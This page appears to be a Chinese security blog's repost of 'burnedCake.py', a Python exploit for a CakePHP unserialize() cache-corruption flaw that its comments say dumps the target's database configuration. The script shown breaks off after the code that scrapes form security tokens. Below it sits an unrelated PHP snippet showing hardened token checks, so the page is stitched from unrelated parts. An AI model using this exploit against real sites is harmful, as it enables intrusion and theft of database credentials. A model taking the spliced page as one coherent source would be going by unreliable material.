CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit

暗月博客 | Posted 2019-11-21 21:39:57 | 411 views | 1725 characters | about 5 min 45 s to read

#!/usr/bin/python
#
# burnedCake.py - CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
# written by [email protected]
#
# This code exploits an unserialize() vulnerability in the CakePHP security
# component. See http://malloc.im/CakePHP-unserialize.txt for a detailed
# analysis of the vulnerability.
#
# The exploit should work against every CakePHP based application that
# uses POST forms with security tokens and hasn't changed the Cache
# configuration (file-system caching is standard). Exploiting
# other caching configurations is possible but not as elegant.
#
# This POC will output the database config file of the running CakePHP application;
# other payloads are easily possible with a changed PHP code.

from optparse import OptionParser
from urlparse import urlparse, urljoin
import urllib2
import urllib
import re


def request(url, data="", headers={}, debug=0):
    # Plain GET when no body is given, POST otherwise (Python 2 urllib2).
    if data == "":
        request = urllib2.Request(url=url, headers=headers)
    else:
        request = urllib2.Request(url=url, headers=headers, data=data)

    # debuglevel=1 dumps the raw HTTP exchange when -v is set.
    debug_handler = urllib2.HTTPHandler(debuglevel=debug)
    opener = urllib2.build_opener(debug_handler)
    response = opener.open(request)
    return response


if __name__ == "__main__":

    parser = OptionParser(usage="usage: %prog [options] url")

    parser.add_option("-p", "--post", dest="post",
                      help="additional post content as urlencoded string")
    parser.add_option("-v", action="store_true", dest="verbose",
                      help="verbose mode")

    (options, args) = parser.parse_args()
    if len(args) != 1:
        parser.error("wrong number of arguments")
    if options.verbose:
        debug = 1
    else:
        debug = 0
    if not options.post:
        options.post = ""
    url = urlparse(args[0])
    html = request(url.geturl(), debug=debug).read()

    # Scrape the Security component's hidden token fields and the form
    # action from the rendered page.
    try:
        key = re.search("data\[_Token\]\[key\]\" value=\"(.*?)\"", html).group(1)
        path = re.search('method="post" action="(.*?)"', html).group(1)
        fields = re.search('data\[_Token\]\[fields\]" value="([0-9a-f]{32}).*?"', html).group(1)
    except:
        print "[x] Regex failed! :("
        exit()
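As an added defender-side illustration, not code from this page and not CakePHP's own implementation: the shape the exploit depends on is request-derived data reaching unserialize(), shown here in a hypothetical form-token check beside a version that keeps token state server-side and binds the client-held id with an HMAC. Function names, the `_Token` field layout and the server-side store are assumptions.

```php
<?php
// Illustrative only: a hypothetical form-token check, NOT CakePHP's code.

// --- risky: token state round-trips through the client as a serialized blob
function check_token_risky(array $post): bool {
    // The blob is attacker-controlled, so any class with __wakeup() or
    // __destruct() reachable by the autoloader becomes instantiable here.
    $state = unserialize($post['_Token']['state'] ?? '');
    return is_array($state) && isset($state['fields']);
}

// --- hardened: state stays server-side; the client only carries an id + MAC
function issue_token(array $fields, string $secret): array {
    $id  = bin2hex(random_bytes(16));
    $mac = hash_hmac('sha256', $id . '|' . json_encode($fields), $secret);
    // $fields would be persisted under $id in a server-side store (assumed).
    return ['id' => $id, 'mac' => $mac];
}

function check_token_hardened(array $post, array $storedFields, string $secret): bool {
    $id  = $post['_Token']['id']  ?? '';
    $mac = $post['_Token']['mac'] ?? '';
    // Reject anything that is not the 32-hex-char id we issued.
    if (!preg_match('/^[0-9a-f]{32}$/', $id)) {
        return false;
    }
    $expected = hash_hmac('sha256', $id . '|' . json_encode($storedFields), $secret);
    // Constant-time comparison; no deserialization of client data anywhere.
    return hash_equals($expected, $mac);
}

// If a serialized value must be parsed at all, forbid object instantiation
// (PHP >= 7.0): scalars and arrays still decode, objects become __PHP_Incomplete_Class.
function safe_unserialize(string $blob) {
    return unserialize($blob, ['allowed_classes' => false]);
}
```

The hardened check is what removes the exploit's precondition: the security token no longer carries anything the server deserializes.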

  • Posted by 暗月博客 on 2019-11-21 21:39:57
  • Source (CN-SEC 中文网; please keep this link when reprinting): CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit http://cn-sec.com/archives/72193.html
